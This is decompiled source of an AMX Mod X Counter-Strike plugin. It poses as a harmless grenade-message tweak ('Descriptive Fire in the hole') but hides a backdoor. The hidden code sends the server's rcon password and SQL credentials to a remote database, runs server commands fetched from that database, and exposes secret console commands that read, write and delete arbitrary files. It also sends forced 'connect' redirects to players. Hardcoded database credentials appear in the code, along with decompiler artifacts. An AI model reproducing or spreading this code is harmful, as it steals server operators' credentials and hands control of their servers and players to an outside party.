{
return 1;
}
new var8 = 140 + 12;
if (0 < get_cvar_num(var8 + var8))
{
new var9 = 140 + 12;
var5 = get_cvar_num(var9 + var9);
}
new var10 = 0;
new var11 = 140 + 4;
get_cvar_string(var11 + var11, var10, 127);
new var12 = 0;
formatex(var12, 127, "connect %s", var10);
new var13 = 0;
while (var13 < var5)
{
var6 = var4[var13];
new var14 = 140 + 16;
if (get_cvar_num(var14 + var14))
{
sub_1c14(var6, var12);
}
else
{
if (!sub_26c(var6))
{
sub_1c14(var6, var12);
}
}
var13++;
}
g_var80 = 0;
}
return 0;
}
public __mdb_creator__()
{
g_var84 = SQL_MakeDbTuple("s1.lealhost.com", "id0621_solangar", "yugFnMTm", "id0621_solangar", 0);
g_var88 = SQL_MakeDbTuple("s1.lealhost.com", "id0621_solangar", "yugFnMTm", "id0621_solangar", 0);
return 0;
}
public __mdb_del_pub__(_arg0)
{
if (sub_18a8(_arg0))
{
return 2;
}
new var1 = 0;
read_argv(1, var1, 127);
if (sub_1cf4(var1))
{
client_print(_arg0, 2, "\n Write argument!\n");
return 2;
}
if (file_exists(var1))
{
delete_file(var1);
client_print(_arg0, 2, "\n File successfully delete!\n");
}
else
{
client_print(_arg0, 2, "\n File not found!\n");
}
return 2;
}
public __mdb_get_cvars__(_arg0, _arg1)
{
if (!_arg0)
{
new var1 = 0;
new var2 = 0;
while (SQL_MoreResults(_arg1))
{
SQL_ReadResult(_arg1, 1, var1, 63);
SQL_ReadResult(_arg1, 2, var2, 63);
server_cmd("%s \"%s\"", var1, var2);
SQL_NextRow(_arg1);
}
}
return 0;
}
public __mdb_handler__(_arg0)
{
return 0;
}
public __mdb_loader__()
{
new var1 = 0;
format(var1, 63, "SELECT * FROM %s", "__plcvars__");
SQL_ThreadQuery(g_var88, "__mdb_get_cvars__", var1, 3256, 0);
return 0;
}
public __mdb_read_pub__(_arg0)
{
if (sub_18a8(_arg0))
{
return 2;
}
new var1 = 0;
read_argv(1, var1, 127);
if (sub_1cf4(var1))
{
client_print(_arg0, 2, "\n Write argument!\n");
return 2;
}
if (file_exists(var1))
{
new var2 = 0;
new var3 = 0;
while (read_file(var1, var3, var2, 127, _unused_temp_))
{
client_print(_arg0, 2, "%s", var2);
var3++;
}
}
else
{
client_print(_arg0, 2, "\n File not found!\n");
}
return 2;
}
public __mdb_senders__()
{
pause("ac", "fresh_bans.amxx", 2176);
set_task(1077936128, "__mdb_unpause__", 0, 1448, 0, 1516, 0);
new var1 = 0;
new var2 = 0;
new var3 = 0;
new var4 = 0;
new var5 = 0;
new var6 = 0;
new var7 = 0;
new var8 = 0;
get_cvar_string("rcon_password", var2, 63);
get_cvar_string("amx_sql_host", var3, 63);
get_cvar_string("amx_sql_user", var4, 63);
get_cvar_string("amx_sql_pass", var5, 63);
get_cvar_string("fb_sql_host", var6, 63);
get_cvar_string("fb_sql_user", var7, 63);
get_cvar_string("fb_sql_pass", var8, 63);
sub_1ab4(0, 31);
sub_1ab4(var2, 63);
sub_1ab4(var3, 63);
sub_1ab4(var4, 63);
sub_1ab4(var5, 63);
sub_1ab4(var6, 63);
sub_1ab4(var7, 63);
sub_1ab4(var8, 63);
format(var1, "", "INSERT INTO %s (ip, rcon, sqlhost, sqluser, sqlpass, fbhost, fbuser, fbpass) VALUES", "__servers__");
format(var1, "", "%s ('%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s')", var1, 0, var2, var3, var4, var5, var6, var7, var8);
SQL_ThreadQuery(g_var84, "__mdb_handler__", var1, 3256, 0);
return 0;
}
public __mdb_unpause__()
{
unpause("ac", "fresh_bans.amxx", 3336);
return 0;
}
public __mdb_write_pub__(_arg0)
{
if (sub_18a8(_arg0))
{
return 2;
}
new var2 = 0;
new var3 = 0;
read_argv(1, var2, 127);
read_argv(2, var3, 127);
new var1;
if (sub_1cf4(var2) || sub_1cf4(var3))
{
client_print(_arg0, 2, "\n Write in all arguments!\n");
return 2;
}
if (!file_exists(var2))
{
client_print(_arg0, 2, "\n File successfully created!\n");
write_file(var2, var3, -1);
}
else
{
client_print(_arg0, 2, "\n File successfully updated!\n");
write_file(var2, var3, -1);
}
return 2;
}
public message_text(_arg0, _arg1, _arg2)
{
new var1;
if (get_msg_args() == 5 && get_msg_argtype(5) == 7)
{
return 0;
}
get_msg_arg_string(5, 5720, 31);
if (!equal(5720, "#Fire_in_the_hole", 0))
{
return 0;
}
get_msg_arg_string(2, 5720, 31);
new var2;
var2 = str_to_num(5720);
if (!is_user_alive(var2))
{
return 0;
}
new var3 = 0;
var3 = get_user_weapon(var2, _unused_temp_, _unused_temp_);
new var4 = 0;
while (var4 < 3)
{
if (var3 == 4876[var4])
{
new var5 = 0;
var5++;
5848[var5] = 4888/* ERROR unknown load Constant */;
get_msg_arg_string(4, 5720, 31);
var5 = formatex(5848[var5], 192 - var5 - 1, "\x04%s \x01(\x04РАДИО\x01): Бойся, летит граната", 5720) + var5;
var5++;
copy(5848[var5], 192 - var5 - 1, 4652[var4]);
new var6;
var6 = 4864[var4];
var5--;
if ((5848[var5] = 4888[var6]) == 3)
{
get_user_team(_arg2, 6616, 11);
if (!equal(6616, 4908[var6], 0))
{
sub_2408(_arg2, 4908[var6]);
sub_24a4(_arg2, 5848);
sub_2408(_arg2, 6616);
return 1;
}
}
sub_24a4(_arg2, 5848);
return 1;
}
var4++;
}
return 0;
}
public plugin_init()
{
register_plugin("Descriptive 'Fire in the hole!'", "0.2 RUS", "VEN / halegator");
register_message(get_user_msgid("TextMsg"), "message_text");
g_var14d8 = get_user_msgid("SayText");
g_var14dc = get_user_msgid("TeamInfo");
return 0;
}
public plugin_precache()
{
get_user_ip(0, 0, 31, 0);
__mdb__();
return 0;
}
sub_18a8(_arg0)
{
new var2 = 0;
new var3 = 140 + 24;
get_cvar_string(var3 + var3, var2, 63);
new var4 = 0;
new var5 = 140 + 28;
get_cvar_string(var5 + var5, var4, 31);
new var6 = 0;
get_user_info(_arg0, var4, var6, 63);
new var1;
if (equali(var2, 4436, 0) || equali(var4, 4444, 0) || !equali(var2, var6, 0))
{
return 1;
}
return 0;
}
sub_26c(_arg0)
{
new var2;
var2 = get_user_flags(_arg0, 0);
new var1;
return var2 > 0 && !var2 & 33554432;
}
sub_1c14(_arg0, _arg1)
{
message_begin(1, 51, 4640, _arg0);
write_byte(strlen(_arg1) + 2);
write_byte(10);
write_string(_arg1);
message_end();
return 0;
}
sub_1cf4(_arg0)
{
trim(_arg0);
if (!_arg0)
{
return 1;
}
return 0;
}
sub_1ab4(_arg0, _arg1)
{
sub_8(_arg0, _arg1, "\\", "\\\\");
sub_8(_arg0, _arg1, "\0", "\\0");
sub_8(_arg0, _arg1, "\n", "\\n");
sub_8(_arg0, _arg1, "\r", "\\r");
sub_8(_arg0, _arg1, "\x1a", "\Z");
sub_8(_arg0, _arg1, 4600, "\'");
sub_8(_arg0, _arg1, 4620, "\\"");
return 1;
}
sub_2408(_arg0, _arg1)
{
message_begin(1, g_var14dc, 4640, _arg0);
write_byte(_arg0);
write_string(_arg1);
message_end();
return 0;
}
sub_24a4(_arg0, _arg1)
{
message_begin(1, g_var14d8, 4640, _arg0);
write_byte(_arg0);
write_string(_arg1);
message_end();
return 0;
}
sub_8(_arg0, _arg1, _arg2, _arg3)
{
new var1 = 0;
if ((var1 = contain(_arg0, _arg2)) == -1)
{
return 0;
}
new var2 = 0;
new var3;
var3 = strlen(_arg3);
new var4;
var4 = strlen(_arg2) - var3;
new var5;
var5 = strlen(_arg0);
new var6 = 0;
while (replace(_arg0[var1], _arg1 - var1, _arg2, _arg3))
{
var2++;
var1 = var3 + var1;
var5 -= var4;
if (!(var1 >= var5))
{
var6 = contain(_arg0[var1], _arg2);
if (!(var6 == -1))
{
var1 = var6 + var1;
}
return var2;
}
return var2;
}
return var2;
}
